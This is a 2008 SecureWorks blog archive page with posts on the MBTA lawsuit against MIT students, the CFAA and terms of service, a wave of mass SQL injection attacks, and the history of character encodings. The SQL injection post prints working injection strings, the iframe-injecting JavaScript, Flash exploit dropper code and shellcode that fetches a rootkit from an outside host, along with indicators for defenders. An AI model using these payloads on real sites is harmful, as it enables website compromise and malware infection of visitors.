Research

Author Archives

Is Security Research Protected Speech? UPDATE

Tuesday, August 19th, 2008

UPDATE: The Boston Herald is now reporting that in today’s hearing (8/19/08), Judge O’Toole has rejected the MBTA’s request to impose a five month injunction. The temporary restraining order expired at earlier today. The MIT students are no longer subject to any judicial orders restraining them from speaking about their research.

Share This Blog | SlashDot | del.ico.us | Technorati | Reddit | Digg it

Is Security Research Protected Speech?

Tuesday, August 19th, 2008

On Thursday August 14th, 2008, there was another hearing in the dispute between the group of MIT students and the Massachusetts Bay Transportation Authority (MBTA). Judge O’Toole decided to allow the temporary restraining order which prevented the students from giving their presentation titled “Anatomy of a Subway Hack” or to discuss related information to stand without modification. The next hearing will be on Tuesday when the temporary restraining order expires. It seems likely that the MBTA will then ask for a more permanent injunction.

During the emergency hearing on Saturday, August 9th, the Electronic Frontier Foundation (EFF) providing counsel for the students argued that a temporary restraining order of this kind imposed prior restraint upon their speech. A party seeking prior restraint of another’s speech is considered to have a very high burden to prove that they are not unduly burdening the other parties freedom of speech. The most famous case involving prior restraint is New York Times Co. v. United States, better known as the Pentagon Papers. In this case the Supreme Court found that the Government’s interest in restricting the publication of classified material was not sufficient to trump the New York Time’s 1st Amedment rights. The material in question described the Government’s actions in Vietnam, while American soldiers were still fighting in the region. Subsequently the courts have stated that only the most important of government needs, such as revealing the location of our troops in the field, would allow prior restraint. It would not seem that the possible harm of informing people how to get a free ride on the subway would rise to that level.

How is it then that the MBTA was able to obtain a temporary restraining order preventing the students from speaking? Judge Woodlock, the judge who presided over the emergency hearing on August 9th, interpreted the Computer Fraud and Abuse Act (CFAA) to mean that the students, while giving a talk at Defcon and/or making software available for download, could be in violation of the CFAA. Specificly the clause that criminalizes anyone who “knowingly causes the transmission of a program, information, code, or command and as a result of such conduct, intentionally causes damage without authorization, to a protected computer”. The Judge’s interpretation is that the talk constitutes transmitting information and that if after the talk any of the attendees then damage the MBTA by bypassing the fare system, this counts as damage.

The EFF, needless to say, disagrees. The EFF argued that in the CFAA transmission means transmitting information to a computer, not a person (otherwise the statue would infringe upon the 1st Amendment and in other paragraphs uses the term communicate to refer to giving information to a person). The EFF also argues that the damage must occur as a direct result of the transmission of the information / code. They say that if someone else later commits a crime based upon information you transmitted to them, the link between the action and the damage is too attenuated to be combined into a violation of the statute. It also seems that according to the EFF the damage must be to the computer system, or damages associated with downtime or cleaning up after an incident. There are other provisions of the CFAA that cover stealing information and unauthorized access with intent to defraud. However they do not seem to apply in this case and are not the provisions the judge relied upon when he granted the temporary restraining order. The CFAA, although a criminal statute, allows people to bring civil action to recover damages incurred from violating the statute and to ask the court to enjoin continued violation of the statue.

The free speech issues the EFF raised at the emergency hearing on Saturday, August 9th were not addressed at that time, but the MBTA did mention them in their brief for the August 14th hearing. The MBTA first called the MIT students’ speech an incitement to a crime, and second stated that: “The Individual Defendants’ DEFCON presentation constitutes commercial speech. Commercial speech is any speech that proposes a commercial transaction. As commercial speech advertising illegal activity, it receives no First Amendment protection. Here, the Presentation is full of marketing, and self-promotional statements. It is not a research paper. [Plaintiff’s Opposition to Cross Motion for Reconsideration of Defendants]

I have not heard a recording of the hearing on the 14th, however I’m sure the EFF would take the position that the students’ paper was academic research, which is fully protected by the 1st Amendment. The paper was written while the students were attending one of the most prestigious engineering schools in the world, it was written (and turned into a talk) under the guidance of the extremely well known and respected Professor Rivest (the R in RSA) and then was intended to be presented at a computer security conference. The EFF also submitted as evidence a letter from 11 professors and industry professionals detailing the dangers of preventing this kind of research from being made public.

The other interesting aspect about this is that the MIT students provided a confidential vulnerability assessment of the fare system to the MBTA. The students stated that this document contained more detailed and potentially damaging information then they intended to give at their Defcon talk. The MBTA submitted this document as evidence in the court hearing and in doing so it became part of the public record. The EFF advised the MBTA of the dangers of this, and suggested that they take emergency action in sealing the information so as to prevent it from becoming public. It does not appear the MBTA took any action to prevent this from happening.

This raises many questions in my mind. If we were to look at the MIT students’ conduct in the worst possible light, it is that they wanted to provide details of security flaws to a large group of hackers with either the intent or reckless disregard to the fact that some of the attendees would use this information to evade paying fares at the T. The MBTA calls this commercial speech and an incitement to a crime.

According to the MIT students, the MBTA provided substantially the same or more information to the public in the form of a court filing. What is the difference between these two? What makes one actionable under the law and not the other? Is it the substantiative information about the security flaws? Is it the location and audience that makes the difference? There was a presentation on the Mifare card (the same card used by the T) security at Blackhat that went on without a legal challenge. There was a legal action brought against a university in the Netherlands to attempt to prevent them from publishing similar Mifare research, but a Dutch court ruled in favor of the university.

If the students had presented this same information in an academic journal or a more academic sounding (as opposed to the scary sounding, hacker infested Defcon) conference would that have been ok? Or was it the provocative language in the students presentation? They did use phrases like “Want free subway rides for life?”, “This is illegal - for educational use only” (the judge in the emergency hearing found this phrase to be tongue in cheek and offensive), and “Is this hackable? Yes!”. Or is it motive that makes this speech possibly unprotected? Is the difference that the MIT students wanted to encourage others to break the law and that the MBTA is just trying to educate the court? Can the aforementioned choice of venue, audience, and tone of their speech be seen as sufficient to indicate that their motive is to incite others to violate the law?

I’m not a lawyer, so I can’t speak authoritatively on what speech is protected under the First Amendment. However, it seems that it is the tone of the students speech more than the technical content that is causing (or exacerbating) their legal problems. Unfortunately I’ve found in looking into other caes that it seems that when faced with complex questions of technology and law, sometimes judges will fall back to one of the more classical elements of crime - motive.

If the defendant seems to have had malicious intent, then he likely violated a law. For example, in the David Ritz case I blogged about earlier, one of the findings was that, “The Court finds by clear and convincing evidence that Ritz is guilty of actual malice. Sierra is entitled to an award of exemplary damages for the sake of example and by way of punishing Ritz.” Ritz may have harbored malicious intent towards Sierra (Ritz alleges that Sierra is a spam house), but is that the key point that should make his DNS zone transfer unlawful? Is it right to punish one person but not another for obtaining the same publicly available information simply because their motives differed? Likewise, should the MIT students be stopped from sharing their research because of the admittedly juvenile and offensive manner in which it was presented. I don’t agree, but instead of suggesting a way to deal with these questions, I’ll end with a quote from Justice Black’s opinion in the Pentagon Papers case “The word ’security’ is a broad, vague generality whose contours should not be invoked to abrogate the fundamental law embodied in the 1st Amendment.” [New York Times Co. v. United States]

SecureWorks follows a responsible disclosure policy when discovering a vulnerability. It can be found at http://www.secureworks.com/research/disclosure.html

Share This Blog | SlashDot | del.ico.us | Technorati | Reddit | Digg it

False Positives in the Legal System

Wednesday, July 2nd, 2008

Recently Lori Drew was charged with violating the Computer Fraud and Abuse Act for signing up for a MySpace account under a fake name. While the larger circumstances were quite shocking (and have been covered enough I don’t think I need to go into them), she was charged for nothing more than pretending to be someone else on the Internet. The indictment calls this a felony, under title 130 section (a) (2) (c) of the US Code, which criminalizes anyone who “intentionally accesses a computer without authorization or exceeds authorized access, and thereby obtains information from any protected computer if the conduct involved an interstate or foreign communication.” The access to MySpace was unauthorized because using a fake name violated the terms of service. The information from a “protected computer” was the profiles of other MySpace users.

If this is found to be a valid interpretation of the law, it’s really quite frightening. If you violate the Terms of Service of a website, you can be charged with hacking. That’s an astounding concept. Does this mean that everyone who uses Bugmenot could be prosecuted? Also, this isn’t a minor crime, it’s a felony punishable by up to 5 years imprisonment per count. In Drew’s case she was charged with three counts for accessing MySpace on three different occasions.

This isn’t the first time that there’s been a controversial ruling based on these laws. Earlier this year David Ritz was fined over $50,000 in civil proceedings under a similar state statute in Sierra Corporate Design, Inc. v. David Ritz.

Ritz looked at DNS records in an attempt to get more information about a company he alleges was spamming. He used a zone transfer to retrieve all of the records on the Plaintiff’s DNS server. The judge found that “Ritz’s behavior in conducting a zone transfer was unauthorized within the meaning of the North Dakota Computer Crime Law.” The Plaintiff in the case argued that because a zone transfer was an obscure command, and because it was intended only for use by DNS administrators, it was unauthorized access, and that the information he obtained was not publicly available. This was found to be true even though the Plaintiff’s DNS server would happily hand out that information to whoever asked. I personally, as well as many other security and network professionals, consider this a legitimate use of a publicly available service. It may not be in the best interest of the plaintiff to make this information public, but that doesn’t mean that the Ritz should incur legal liability for accessing (or using) it.

The problem is that there is no generally accepted definition of what unauthorized means in this context. Law makers either didn’t define the term or if they did, used such sweeping language that the definition is plainly overbroad. One Kansas statue defined access as “to approach, instruct, communicate with, store data in, retrieve data from, or otherwise make use of any resources of a computer.” A judge rejected that definition, saying that if it was used, then “any unauthorized physical proximity to a computer could constitute a crime” and instead used the definition of access from Webster’s dictionary.

Such overarching language is also common in the terms of service used by ISPs and websites to define what is allowed to happen on their website or service. These documents are written by lawyers trying to shield their employers / clients from harm, not set up a set of usable rules of conduct. As such they are routinely ignored by both service providers and visitors. Commonly they contain clauses that no reasonable person could expect to abide by. One example is a TOS that expects users to not “violate any local, state, federal, or non-U.S. law, order, or regulation.” In conjunction with the CFAA, wouldn’t this make violating any law from any country a violation of US law? Another clause which is commonly found in a TOS, is to not include any content which is “threatening, abusive, defamatory, invasive of privacy or publicity rights, vulgar, obscene, profane or otherwise objectionable.” This type of clause seems to be intended to prohibit being mean on the Internet. The ironic thing is that it’s not uncommon to find TOS which prohibit the majority of content on the web site, for example a celebrity gossip site forbidding the posting of sensitive information.

The discrepancy between the TOS and the actual use of a website has had negative consequences. In March, New Jersey Attorney General Anne Milgram subpoenaed the website juicycampus.com. Milgram felt that it was a possible violation of the Consumer Fraud Act for the website to disallow offensive content in it’s TOS, but to not actively remove offensive content. Juicycampus.com is a gossip site, which goes out of it’s way to solicit, well, juicy gossip about college life. The website uses slogans like “Always Anonymous. Always Juicy,” so it sure looks like the website is going out of it’s way to solicit offensive content. Why does it say that such content is disallowed in it’s TOS? In Ritz’s case one of the findings of law was that “Ritz has engaged in a variety of activities without authorization on the Internet. Those activities include … the compilation and publication of Whois lookups without authorization from Network Solutions.”

Whois data is intended to be used to identify the owners of a domain and communicate that information to others. However, the TOS reads the “compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of Network Solutions.” This portion of the TOS clearly contradicts the intended use of the data, so why is it there?

I think it’s because the lawyers who wrote it wanted the most leverage possible if and when they felt it necessary to take legal action against someone using the data in a way they didn’t like. Unfortunately, this overly restrictive TOS helped contribute to a $50,000 judgment against Ritz.

In my perspective, as someone who writes IPS signatures, these issues are the result of not paying enough attention to false positives. The dedication to preventing false positives in the American legal system can be seen from Benjamin Franklin’s rephrasing of Blackstone’s formulation: “that it is better [one hundred] guilty Persons should escape than that one innocent Person should suffer.” Defining what constitutes an unauthorized and criminal violation of a computer system is an extremely difficult task, but it is an important enough issue that it deserves an earnest effort. While legislatures may have the advantage that unlike my IPS signatures, their laws are interpreted by judges, prosecutors and other people who are capable of exercising independent judgment, that’s no reason to write overly broad laws that criminalize the majority of Internet users. When those laws are so broad as to be unknowingly violated and unenforceable as written, judges should strike them down for vagueness. Website and ISP operators should also not write TOS that they know will be violated by legitimate users of their site. It might be nice if there was a principal of contract law that invalided Terms of Service which are so over broad as to be meaningless. However, even if this is not the case then they should still do so because words mean something and contracts and laws should as well.

Share This Blog | SlashDot | del.ico.us | Technorati | Reddit | Digg it

New Round of Mass SQL Injections

Wednesday, June 4th, 2008

There’s a new round of the Mass SQL injection attacks that have been going on for the past few months. This time it looks like the bad guys are using a slightly different variant of the SQL injection attack and the backend malware dropper pages. In previous iterations the SQL attack looked like this:

;DECLARE%20@S%20NVARCHAR(4000);SET% 20@S=CAST(0x44004500
43004C00410052004500200040005400200076006100720063006800
61007200280032003500350029002C00400043002000760061007200
63006800610072002800320035003500290020004400450043004C00
41005200450020005400610062006C0065005F004300750072007300
6F007200200043005500520053004F005200200046004F0052002000
730065006C00650063007400200061002E006E0061006D0065002C00
62002E006E0061006D0065002000660072006F006D00200073007900
73006F0062006A006500630074007300200061002C00730079007300
63006F006C0075006D006E0073002000620020007700680065007200
6500200061002E00690064003D0062002E0069006400200061006E00
6400200061002E00780074007900700065003D002700750027002000
61006E0064002000280062002E00780074007900700065003D003900
390020006F007200200062002E00780074007900700065003D003300
350020006F007200200062002E00780074007900700065003D003200
3300310020006F007200200062002E00780074007900700065003D00
310036003700290020004F00500045004E0020005400610062006C00
65005F0043007500720073006F007200200046004500540043004800
20004E004500580054002000460052004F004D002000200054006100
62006C0065005F0043007500720073006F007200200049004E005400
4F002000400054002C004000430020005700480049004C0045002800
40004000460045005400430048005F00530054004100540055005300
3D0030002900200042004500470049004E0020006500780065006300
2800270075007000640061007400650020005B0027002B0040005400
2B0027005D00200073006500740020005B0027002B00400043002B00
27005D003D0072007400720069006D00280063006F006E0076006500
72007400280076006100720063006800610072002C005B0027002B00
400043002B0027005D00290029002B00270027003C00730063007200
69007000740020007300720063003D0068007400740070003A002F00
2F007700770077002E006E006900680061006F007200720031002E00
63006F006D002F0031002E006A0073003E003C002F00730063007200
6900700074003E002700270027002900460045005400430048002000
4E004500580054002000460052004F004D0020002000540061006200
6C0065005F004300750020073006F007200200049004E0054004F002
000400054002C0040004300200045004E004400200043004C004F005
300450020005400610062006C0065005F0043007500720073006F007
20020004400450041004C004C004F004300410054004500200054006
10062006C0065005F0043007500720073006F007200
%20AS%20NVARCHAR(4000));EXEC(@S);--

The new SQL injection looks slightly different. Less of the SQL code is contained within the CAST construct, so the total amount of code is smaller than the previous attack. The attacker did use the ever popular alternating ( aka elite ) caps in what appears to be an attempt to obfuscate the code. Thankfully for all those who write I(D|P)S rules, the good old /i flag will still match it.

;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20
tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20
sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTy
Pe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe
=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next
%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)
%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim
(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C7363726970742
07372633D687474703A2F2F7777772E7869616F6261697368616E2E6E65742
F64742F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr
(67))')%20fEtCh%20next%20FrOm%0tAbLe_cursoR%20iNtO%20@t,@c%20eNd
%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- HTTP/1.1

On the other side of the exploit, users who are affected by the embeded script tags will be sent to this JavaScript page:

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("pidupdatessl=");
if (start != -1)
{}else{
var expires = new Date();
expires.setTime(expires.getTime()+24*1*60*60*1000);
document.cookie = "pidupdatessl=update;expires=" + expires.toGMTString();
try{
document.write("<iframe src=hxxp://en-us18.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}

That page then opens an invisible IFrame, which injects the code which actually drops the malicious Flash files.

<html>
<body>
<script>
var Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",");
if(Flashver[2] == 115){
        document.write("<embed src=\"advert.swf\"></embed>");
}
if(Flashver[2] == 47){
        document.write("<embed src=\"banner.swf\"></embed>");
        }
</script>
</body>
</html>

That’s much cleaner than some of the previous rounds which would open up 3 or 4 different IFrames full of malware. Given that the Flash exploit is newer and more universal, I can see why the bad guys would decide to use it exclusively. There are reports that the newest Flash exploit will work on versions up to 115, which seems credible given that the bad guys are testing for that version. Previously the bad guys used a grab bag of ActiveX, RealPlayer and other exploits. I wouldn’t be suprised if that approach led to a lot more crashes. If any of the exploits failed it could cause the browser to crash, and that’s not even considering the possibility that the exploits might step on each others’ toes.

The malicious Flash files look to be based upon Mark Dowd’s Inhuman Flash exploit. They seem almost identical, with both downloading a root kit ( dddd.exe on one ddd2.exe on the other ) with very similar names. The root kits are both the same.

00000090  8b 03 c5 c3 75 72 6c 6d  6f 6e 2e 64 6c 6c 00 95  |....urlmon.dll..|
000000a0  bf d0 a7 17 47 e8 aa ff  ff ff 83 ec 04 83 2c 24  |....G.........,$|
000000b0  16 ff d0 95 50 bf e2 e6  58 1b e8 95 ff ff ff 8b  |....P...X.......|
000000c0  54 24 fc 8d 52 0e 33 db  53 53 52 eb 3b 43 3a 5c  |T$..R.3.SSR.;C:\|
000000d0  38 38 38 37 36 2e 65 78  65 00 53 ff d0 5d bf f7  |88876.exe.S..]..|
000000e0  7e be ad e8 6c ff ff ff  83 ec 04 83 2c 24 1b ff  |~...l.......,$..|
000000f0  d0 bf 02 f2 26 8f e8 59  ff ff ff 61 68 55 d6 1a  |....&..Y...ahU..|
00000100  30 83 c4 08 ff 64 24 f8  e8 cd ff ff ff 68 74 74  |0....d$......hxx|
00000110  70 3a 2f 2f 6c 6f 63 61  6c 65 34 38 2e 63 6f 6d  |p://locale48.com|
00000120  2f 61 64 2f 64 64 64 32  2e 65 78 65 00 00 00 00  |/ad/ddd2.exe....|

New Malicious domains:

  • hxxp://o7n9.cn/
  • hxxp://www.redir94.com/b.js
  • hxxp://www.rexec39.com/b.js
  • hxxp://www.locale48.com/b.js
  • hxxp://www.rundll92.com/b.js
  • hxxp://www.libid53.com/b.js
  • hxxp://www.en-us18.com/b.js
  • hxxp://www.script46.com/b.js
  • hxxp://www.xiaobaishan.net/bjs

md5 hashes:

  • a8002df6e691465bc0aad94c7bf86160 advert.swf
  • ac3cb5bdbe3f6ed14cee7e5e94fc83a5 banner.swf
  • 49b13ae1a881132440dd15e50310328f ddd2.exe
  • 49b13ae1a881132440dd15e50310328f dddd.exe
Share This Blog | SlashDot | del.ico.us | Technorati | Reddit | Digg it

Character Encoding Issues

Tuesday, March 4th, 2008

Recently, Core Security announced a vulnerability in VMware Workstation (Server and ESX are unaffected) that allows a guest operating system to break out of its virtualized environment and interact with the host operating systems. They discovered it was possible to break out of the virtualized environment by using a directory traversal attack on a shared folder designed to allow data to be passed between the guest operating system(s) and the host operating system. This attack is possible despite attempts to sanitize the path string for dangerous (”..”) characters because the sanitation routine is called before the path string is normalized using a Microsoft library call to convert characters from UTF-8 to UTF-16. It is better practice to normalize a string before sanitizing it for dangerous characters, but the complexity of character encoding has caused other vulnerabilities in the past.

Looking into this vulnerability made me curious about the variety of encoding schemes that are in common use today. I had a basic grasp of ASCII, and knew vaguely about Latin-1 and Unicode, but I didn’t know the kind of in-depth details that are needed in the security world. I decided that in order to really understand the issues involved I would have to go back and learn how various encoding standards were used historically and how we got from them to our most current batch of standards.

It all started with that familiar mainstay of the computer world. ASCII, or the American Standard Code for Information Interchange was first published as an American Standard back in 1963. The standard is only 12 pages long, and the Standard Code itself only described 100 characters filling 7 bits. The first standard didn’t even include lower case letters. The Standard Code was designed for information interchange between such varied devices as punch card reader/writers, tape (perforated and magnetic) machines, telegraphs and other devices. One device that ASCII was not designed for was computer monitors. In the 60’s computer time was much too valuable to use just to display information on a screen to a user. In a statement oddly presaging the legendary quote from Bill Gates about 640k of memory, Appendix A of the ASCII-1963 standard states that “A 7-bit set is the minimum size that will meet requirements” … “Both a 6-bit and 8-bit set were considered and rejected” … “the 8-bit because it provides far more characters than are now needed in general applications.” A later version of ASCII would add lower case letters and would also merge the ASCII standard with ISO-646 (also ECMA-6).

Once the CRT revolution swept the computing industry and we moved away from punch cards and teletypes, people found that there was an extra, unused bit in every byte used to record a character. This led to many different custom “extended ASCII” character sets. IBM’s version used on IBM compatible PCs was probably the most popular of these. Among other things, a primary goal of many of these extensions was to provide accented characters that are used in other Latin script based languages other than English.

In order to have a better way to represent a larger number of languages, the ISO developed the ISO-8859 standard. The ISO-8859 standard defines 15 different character sets designed to be used to represent different language groups, each ISO-8559 character is encoded in one byte, so there are 256 possible characters. The most commonly used of the ISO-8859 family is ISO-8859-1 (also known as ISO-8559-Latin-1, or just Latin-1). The Latin-1 standard is designed for Western European languages. The ISO-8859-1 standard supports the following languages: Afrikaans, Albanian, Breton, Danish, Dutch, English, Estonian, Faroese, French, Finnish, Galician, German, Icelandic, Irish, Italian, Latin, Luxembourgish, Norwegian, Occitan, Portuguese, Rhaeto-Romanic, Scottish Gaelic, Spanish, Swahili, Swedish, Walloon, Welsh and Basque. Other ISO-8859 standards cover other languages, such as ISO-8859-5 for Cryllic based languages and ISO-8859-8 for the Hebrew language.

In the same way that IBM extended ASCII, the ISO-8859-1 character set consists of the base of the printable ASCII characters in the same position and then additional characters to fill the extra space made available by using the 8th bit. The ISO-8859-1 standard was first published in 1985. The ISO-8859 standards allow a large number of languages to be encoded in one family of standards. This allowed much greater interoperability and standardization between speakers of different languages, but there were still some things that could not be done by these standards, such as capturing if a language is ordered right to left or vice versa. There was also the issue of multi-byte sequences used by symbol based languages. There was a desire to have one universal character encoding system. The desire for this universal character encoding system was so great that there ended up being two universal systems.

The ISO’s solution to these problems was the Universe Character Set, or ISO 10646. This extremely ambitious undertaking planned to create a truly universal character set. With over a million possible characters (earlier drafts had the space for over two million), the goal was to encode every historic, current or future language in one standard. This massive code space is broken up into different planes to simplify things. Almost all commonly used characters inhabit the Basic Multilingual Plane (BMP). But there are other planes for symbol based languages and also a private code space, analogous to RFC 1918 private IP space for imaginary languages. There is even an organization, ConScript, devoted to unofficially sharing this space to make sure every imaginary language has unique code points. With over 130,000 code points allocated to private use, there should be plenty of space for languages like JRR Tolken’s Tengware and Cirth (better known to all but his most die hard fans as Elvish and Dwarish), or not just the expected Klingon, but also Frenghi. I think my favorite of the made up languages is Dr Suess’ extensions to the Latin character set. What’s not to like about a character called ABCDEFGHIJKLMNOPQRSTUVWXYZ?

In addition to the UCS, there was a second universal encoding scheme known as Unicode. Its goals were merely to encode all modern languages, and it was designed to use a smaller 2 byte (64K) character space. Thankfully the two organizations realized that the world didn’t need more than one universal encoding system and has merged the two. Like any merger of two preexisting projects, there have been some complications created, but it’s still probably for the best.

ISO 10646 originally defined two different encoding options for using the UCS. There were UCS-2 and UCS-4, which encoded the UCS in 2 or 4 bytes. However, UCS-2 can use special escape sequences to address characters outside of the Basic Multilingual Plane. One big problem with the UCS encoding is that most common ASCII characters are encoded with leading NULL bytes. This causes all kinds of issues for Unix operating Systems, which traditionally use NULLs to terminate strings.

Unicode was originally designed to be encoded in a simple two byte format known as UTF-16. However, Unicode decided to address the entire Universal Code Space, so it needed a trick to allow UTF-16 to address code space beyond that of a value that can be stored in two bytes. That trick is known as surrogate characters.

Surrogate characters are special two byte values that are used to indicate a four byte character. To ensure compatibility between ISO 10646 and Unicode, surrogate code points have been officially reserved in the UCS code space and will not be used for any other purpose. Surrogate characters solved the problem of allowing what was originally a two byte code to address four bytes worth of address space.

There was another problem with Unicode. A large part of the Unix world was (and still is) based around the concept of one character per byte and binary compatibility with the old ASCII standard. One evening a gentleman named Ken Thompson (whom you may be familiar with for such modest innovations as the B programming language and the UNIX operating system) decided to scribble a better encoding standard on a New Jersey diner placemat. This new standard was called UTF-8 and was a variable length encoding which preserved the original one byte encoding of printable characters from the ASCII set. The entire UCS could be addressed by using up to 6 bytes.

There is also an encoding called UTF-7 which was designed to allow Unicode characters to be used in places ( such as SMTP ) which are required to be 7 bit clean. It is not a Unicode or ISO standard, but did have an RFC devoted to it. Another UTF encoding is UTF-32, which just uses four bytes to represent the code, trading space for simplicity.

We now have quite an assortment of encoding options - ASCII, ISO-8559-1, UCS-2, UCS-4, UTF-7, UTF-8, UTF-16, UTF-32. It gets even more interesting when you add in the World Wide Web. Some regular ASCII characters have special meaning in URLs, so a scheme was developed to encode those in a special way on top of a normal ASCII encoding. This is known as URL encoding and is specified in RFC 1738. In this encoding format a special character is represented by a percent symbol followed by two hex digits, which specify the code of the character that is being represented. For example, a space is represented as %20. But because one standard will never do when you can have two, there is another way to represent characters which aren’t allowed in a URL. The ISO also specifies the Numerical Character Reference as ways to represent characters from the UCS in various markup languages. NCS is a sequence of decimal or hex digits prepended by an ampersand and a hash mark. A literal x follows the hash if the characters are in hexadecimal. Σ, or Σ are examples of NCS encoding. It’s also possible to encode UCS characters using the format by prepending the code point with a %u.

With all these different encoding schemes it’s easy to see how the seemingly simple task of interpreting text can become very complex. Areas of complexity make it hard for programmers to understand exactly what their programs are doing. That lack of understanding leads to vulnerabilities. Until the encoding landscape gets simpler and more robust libraries are commonplace for translating from one encoding scheme to another. Security professionals will have to keep an eye on this area.

Share This Blog | SlashDot | del.ico.us | Technorati | Reddit | Digg it
SecureWorks Blogs
Other SecureWorks Blog Categories:
  • General (16)
  • Links (7)
  • Phishing (1)
  • Research (55)
  • Trojans (3)
  • Blogs by Month:
  • August 2008
  • July 2008
  • June 2008
  • May 2008
  • April 2008
  • March 2008
  • February 2008
  • January 2008
  • December 2007
  • November 2007
  • October 2007
  • September 2007
  • August 2007
  • July 2007
  • June 2007
  • May 2007
  • March 2007
  • January 2007
  • December 2006
  • November 2006
  • October 2006
  • September 2006
  • August 2006
  • June 2006
  • May 2006
  • Join Newsletter

    Next Steps

    Start With SecureWorks Request More Information Now
    Call SecureWorks Call Us Today
    877-905-6661